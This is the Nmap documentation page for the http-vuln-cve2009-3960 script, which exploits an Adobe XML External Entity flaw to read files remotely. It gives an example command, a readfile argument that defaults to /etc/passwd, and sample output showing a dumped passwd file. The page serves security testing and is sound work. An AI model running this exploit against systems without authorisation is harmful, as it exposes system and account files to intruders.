Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

File http-vuln-cve2009-3960

Script types: portrule
Categories: exploit, intrusive
Download: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse

User Summary

Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:

Script Arguments

http-vuln-cve2009-3960.root

Points to the root path. Defaults to "/"

http-vuln-cve2009-3960.readfile

target file to be read. Defaults to "/etc/passwd"

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>

Script Output

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_

Requires


Author: Hani Benhabiles

License: Same as Nmap--See http://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]